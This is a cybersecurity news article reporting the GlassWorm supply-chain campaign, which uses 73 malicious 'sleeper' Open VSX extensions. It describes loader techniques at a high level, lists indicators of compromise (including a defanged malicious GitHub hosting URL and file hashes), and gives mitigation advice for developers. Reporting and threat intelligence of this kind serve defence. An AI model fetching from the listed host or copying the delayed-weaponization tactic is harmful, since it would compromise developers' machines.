Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Critical FatFs Vulnerabilities Expose Millions of Embedded Devices
July 4, 2026
Critical Linux Kernel Vulnerability CVE-2023-0179 Grants Root Access
July 4, 2026
Home/CyberSecurity News/GlassWorm Campaign Uses 73 Malicious Open VSX Extensions
CyberSecurity News

GlassWorm Campaign Uses 73 Malicious Open VSX Extensions

Key Takeaways The GlassWorm supply chain attack has intensified with the discovery of 73 new “sleeper” extensions on the Open VSX marketplace. Attackers are now using a sophisticated...

Marcus Rodriguez
Marcus Rodriguez
April 26, 2026 3 Min Read
30 0

Key Takeaways

  • The GlassWorm supply chain attack has intensified with the discovery of 73 new “sleeper” extensions on the Open VSX marketplace.
  • Attackers are now using a sophisticated method where initially benign extensions are weaponized later via updates, making detection more challenging.
  • These malicious extensions mimic popular tools, leveraging fake publisher names and cloned aesthetics to trick developers into installation.
  • The campaign employs both native binaries and heavily obfuscated JavaScript to deliver malicious payloads, often fetching additional .vsix files for IDEs like VS Code and Cursor.

GlassWorm Campaign Escalates with 73 New Malicious Open VSX Extensions

The GlassWorm supply chain attack targeting the Open VSX marketplace has significantly expanded, with researchers uncovering an additional 73 “sleeper” extensions designed to compromise software developers. This latest wave, identified in April 2026, signals a concerning evolution in how threat actors are deploying malware within the developer ecosystem.

Table Of Content

  • Key Takeaways
  • GlassWorm Campaign Escalates with 73 New Malicious Open VSX Extensions
  • The “Sleeper” Extension Strategy
  • Evolving Delivery Mechanisms
  • Indicators of Compromise
  • What You Should Do

This discovery follows a substantial wave of 72 malicious Open VSX extensions linked to the GlassWorm operation, which were documented in March 2026. While earlier iterations of the campaign exploited extension dependency features to silently install malicious loaders, the April 2026 cluster reveals more advanced tactics aimed at evading security scans.

The “Sleeper” Extension Strategy

A “sleeper” extension refers to a deceptive package published by threat actors that initially appears harmless. These extensions are designed to build trust and credibility, accumulating downloads before they are weaponized. Attackers typically create new GitHub accounts to publish these cloned versions of legitimate, popular development tools.

For instance, one example involved attackers creating a fake Turkish Language Pack for Visual Studio Code. This malicious extension meticulously mimicked the legitimate version, copying the globe icon and description, with the only discernible difference being a swapped publisher name. This tactic aims to deceive developers who might not scrutinize publisher details closely.

Once developers install these seemingly benign tools, the attackers bide their time before pushing a software update that delivers the malicious payload. At least six of the 73 newly discovered extensions have already been activated to deploy their intended malware.

Evolving Delivery Mechanisms

The latest iteration of the GlassWorm campaign demonstrates a refined approach to payload delivery. The extension itself now functions primarily as a thin loader, designed to fetch external payloads rather than containing the malicious code directly within its source. This technique significantly reduces the likelihood of immediate detection by security tools.

The campaign employs two primary execution methods:

  • Native Binaries: This method involves bundling .node files, hidden within the extension’s code. A simple JavaScript file then executes this binary, which contains embedded URLs used to download additional malicious .vsix files. These payloads are intended for installation within Integrated Development Environments (IDEs) such as VS Code and Cursor.
  • Obfuscated JavaScript: In this approach, the malicious logic is heavily obfuscated and does not rely on bundled binary files. The code decodes itself at runtime, subsequently retrieving a malicious .vsix payload from a GitHub release and installing it via command-line paths.

Indicators of Compromise

Security teams should actively monitor for the following indicators associated with the GlassWorm campaign:

  • Native Installer Binaries (SHA256): 1b62b7c2ed7cc296ce821f977ef7b22bae59ef1dcdb9a34ae19467ee39bcf168
  • Downloaded VSIX Payload (SHA256): 97c275e3406ad6576529f41604ad138c5bdc4297d195bf61b049e14f6b30adfd
  • Malicious GitHub Hosting: github[.]com/SquadMagistrate10/wnxtgkih
  • Confirmed Malicious Extensions: outsidestormcommand, monochromator-theme, boulderzitunnel, vscode-buddies

What You Should Do

According to the Socket Research Team, developers must exercise extreme caution when installing extensions from the Open VSX marketplace. Practical mitigation steps include:

  • Verify Publisher Namespaces: Always meticulously check the publisher name of any extension, ensuring it matches the official or expected publisher.
  • Inspect Download Counts and Reviews: While not foolproof, higher download counts and consistent positive reviews can be indicators of legitimacy, though attackers are trying to subvert this.
  • Scrutinize Extension Permissions: Understand the permissions an extension requests and question any that seem excessive for its stated functionality.
  • Use Security Tools: Employ security solutions that scan for malicious code in development environments and monitor for suspicious network activity.
  • Stay Updated: Keep development tools and IDEs updated to their latest versions to benefit from security patches.
  • Isolate Development Environments: Consider using virtualized or containerized development environments to limit the potential impact of a compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwareSecurityThreat

Share Article

Marcus Rodriguez

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.

Previous Post

Critical Windows RPC Vulnerability CVE-2022-XXXXX Lets Attackers Escalate Privileges

Next Post

Litecoin Zero-Day DoS Vulnerability Exploited, Disrupts Mining Pools

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us